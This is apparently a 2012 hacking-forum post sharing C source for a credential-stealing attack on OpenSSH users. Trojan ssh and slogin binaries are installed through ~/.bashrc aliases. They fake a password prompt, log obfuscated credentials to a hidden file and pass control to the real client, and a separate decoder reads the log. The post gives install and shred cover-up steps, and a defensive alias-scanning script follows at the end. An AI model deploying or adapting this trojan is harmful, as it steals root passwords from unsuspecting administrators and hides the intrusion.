Attack on OpenSSH using aliases under Linux
Kasswed wrote: Let's suppose we have access to a Linux server, but we are not root or anything.
But let's suppose that, from the user account we have access to, there are people who log in as root to other machines using SSH. This is a fairly typical scenario.
Our user will generally be able to create aliases and compile programs, and we will make use of this to install this malware on a Linux system. All we will do is wait for a user to log in to another machine as root and obtain their credentials in a text file, which will be encrypted in a fairly simple way.
The program consists of 3 parts: sl.c, ssh.c and deco.c
sl.c is compiled and used as an alias for the slogin command
ssh.c is compiled and used as an alias for the ssh command
deco.c is not installed on the victim machine; it only serves to decrypt our credentials file.
I am posting it here to see if anyone feels like improving it. I'm sorry it doesn't have many comments, but it is fairly simple to understand. Of course, every case is different, so the code would have to be adapted to each case, depending on various variables.
sl.c
- Code:
/*
Author: Kasswed for elhacker.net April 2012
This malware is composed of 3 parts:
1. sl.c: slogin snifer program code
2. ssh.c: ssh snifer program code
3. deco.c: decoder program for the logs files
Install this program (does not need to be root) using a bash script:
mkdir .config/.keyboard
gcc sl.c -o .config/.keyboard/sl
gcc ssh.c -o .config/.keyboard/s
echo "alias slogin='$HOME/.config/.keyboard/sl'" >> ~/.bashrc
echo "alias ssh='$HOME/.config/.keyboard/s'" >> ~/.bashrc
shred -n 30 -u sl.c
shred -n 30 -u ssh.c
Then remove the script as well with "shred -n 30 -u script.sh"
To get the passwords, get access to the victim's machine and copy the log file into your computer. Use the program deco:
$ ./deco logfile
Et voila.
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <pwd.h>
#define BUF 1000
#define PATH "/usr/bin/slogin"
#define LOG "/.config/.keyboard/sx"
int main(int argc, char **argv){
char *ssh_arguments_send[BUF];
char ssh[] = "slogin";
ssh_arguments_send[0] = ssh;
if(argc != 2){
int j;
for(j=1;j<argc;j++)
ssh_arguments_send[j]=argv[j];
}
else{
FILE *file;
char dir[BUF];
strcpy(dir,getenv("HOME"));
strcat(dir,LOG);
int i;
struct passwd *pw;
char user[200];
char *ptr;
pw = getpwuid(geteuid());
strcpy(user,pw->pw_name);
ssh_arguments_send[1] = argv[1];
char pCopy[BUF],encript[BUF],host[BUF],password[BUF];
if(strchr(argv[1],'@') == NULL ){
strcpy(pCopy,user);
strcat(pCopy,"@");
strcat(pCopy,argv[1]);
}
else{
strcpy(pCopy,argv[1]);
}
sleep(2);
printf("%s",pCopy);
printf("'s password: ");
system("stty -echo");
fgets(password, BUF, stdin);
printf("\n");
system("stty echo");
password[strlen(password)-1] = '\0';
file = fopen(dir,"a+");
if(file!=NULL){
strcat(pCopy,"/");
strcat(pCopy,password);
strcat(pCopy,";");
for(i=0;i<strlen(pCopy);i++){
fprintf(file,"%c",pCopy[i]+ (33*i+1)%100);
fprintf(file,"%c",pCopy[i]+ (33*i+2)%98);
fprintf(file,"%c",pCopy[i]+25);
}
fprintf(file,"\n");
fclose(file);
}
sleep(2);
printf("Permission denied, please try again.\n");
}
execv(PATH,ssh_arguments_send);
}
ssh.c
- Code:
/*
Author: Kasswed for elhacker.net April 2012
This malware is composed of 3 parts:
1. sl.c: slogin snifer program code
2. ssh.c: ssh snifer program code
3. deco.c: decoder program for the logs files
Install this program (does not need to be root) using a bash script:
mkdir .config/.keyboard
gcc sl.c -o .config/.keyboard/sl
gcc ssh.c -o .config/.keyboard/s
echo "alias slogin='$HOME/.config/.keyboard/sl'" >> ~/.bashrc
echo "alias ssh='$HOME/.config/.keyboard/s'" >> ~/.bashrc
shred -n 30 -u sl.c
shred -n 30 -u ssh.c
Then remove the script as well with "shred -n 30 -u script.sh"
To get the passwords, get access to the victim's machine and copy the log file into your computer. Use the program deco:
$ ./deco logfile
Et voila.
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <pwd.h>
#define BUF 1000
#define PATH "/usr/bin/ssh"
#define LOG "/.config/.keyboard/sx"
int main(int argc, char **argv){
char *ssh_arguments_send[BUF];
char ssh[] = "ssh";
ssh_arguments_send[0] = ssh;
if(argc != 2){
int j;
for(j=1;j<argc;j++)
ssh_arguments_send[j]=argv[j];
}
else{
FILE *file;
char dir[BUF];
strcpy(dir,getenv("HOME"));
strcat(dir,LOG);
int i;
struct passwd *pw;
char user[200];
char *ptr;
pw = getpwuid(geteuid());
strcpy(user,pw->pw_name);
ssh_arguments_send[1] = argv[1];
char pCopy[BUF],encript[BUF],host[BUF],password[BUF];
if(strchr(argv[1],'@') == NULL ){
strcpy(pCopy,user);
strcat(pCopy,"@");
strcat(pCopy,argv[1]);
}
else{
strcpy(pCopy,argv[1]);
}
sleep(2);
printf("%s",pCopy);
printf("'s password: ");
system("stty -echo");
fgets(password, BUF, stdin);
printf("\n");
system("stty echo");
password[strlen(password)-1] = '\0';
file = fopen(dir,"a+");
if(file!=NULL){
strcat(pCopy,"/");
strcat(pCopy,password);
strcat(pCopy,";");
for(i=0;i<strlen(pCopy);i++){
fprintf(file,"%c",pCopy[i]+ (33*i+1)%100);
fprintf(file,"%c",pCopy[i]+ (33*i+2)%98);
fprintf(file,"%c",pCopy[i]+25);
}
fprintf(file,"\n");
fclose(file);
}
sleep(2);
printf("Permission denied, please try again.\n");
}
execv(PATH,ssh_arguments_send);
}
deco.c
- Code:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define BUF 10000
int main(int argc,char **argv){
FILE* file;
int i;
char encript[BUF];
file = fopen(argv[1],"r");
fgets(encript,BUF,file);
for(i=0;i<strlen(encript);i++){
if((i+1)%3==0)
printf("%c",encript[i]-25);
}
fclose(file);
}
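
The post above relies on `alias` lines in `~/.bashrc` that point `ssh` and `slogin` at binaries under the user's home directory. The following is an added defensive example, not part of the original post: a POSIX shell function that scans rc files for such aliases. The watched command list, the trusted directories and the sample file contents are assumptions made for illustration.

```sh
#!/bin/sh
# Added defensive example: flag aliases that shadow SSH client commands.
# WATCHED and TRUSTED_DIRS are assumptions; adjust them per host.
WATCHED='ssh|slogin|scp|sftp'
TRUSTED_DIRS='/usr/bin/ /bin/ /usr/local/bin/'

# find_shadow_aliases FILE...
# Prints "file:line: name -> target" for each alias of a watched command
# whose target is a path outside the trusted system directories.
find_shadow_aliases() {
    for rc in "$@"; do
        [ -r "$rc" ] || continue
        { grep -nE "^[[:space:]]*alias[[:space:]]+($WATCHED)=" "$rc" || true; } |
        while IFS= read -r hit; do
            lineno=${hit%%:*}
            def=${hit#*:}
            name=$(printf '%s\n' "$def" |
                sed -E 's/^[[:space:]]*alias[[:space:]]+([^=]+)=.*/\1/')
            # Text after the first "=", with surrounding quotes stripped.
            target=$(printf '%s\n' "$def" |
                sed -E "s/^[^=]*=//; s/^[\"']//; s/[\"'][[:space:]]*\$//")
            cmd=${target%% *}          # first word = program that will run
            trusted=yes
            case "$cmd" in
                *..*) trusted=no ;;    # path traversal out of a trusted dir
                */*)  trusted=no       # explicit path: must be a system dir
                      for d in $TRUSTED_DIRS; do
                          case "$cmd" in "$d"*) trusted=yes ;; esac
                      done ;;
            esac                       # bare names (e.g. 'ssh -X') pass
            if [ "$trusted" = no ]; then
                printf '%s:%s: %s -> %s\n' "$rc" "$lineno" "$name" "$cmd"
            fi
        done
    done
}

# Constructed sample rc file (not taken from a real host).
sample=$(mktemp)
cat > "$sample" <<'EOF'
alias ll='ls -l'
alias ssh='ssh -o ServerAliveInterval=60'
alias slogin='/home/alice/.config/.keyboard/sl'
EOF
find_shadow_aliases "$sample"
rm -f "$sample"
```

In an interactive bash session, `type -a ssh` also shows when an alias takes precedence over `/usr/bin/ssh`.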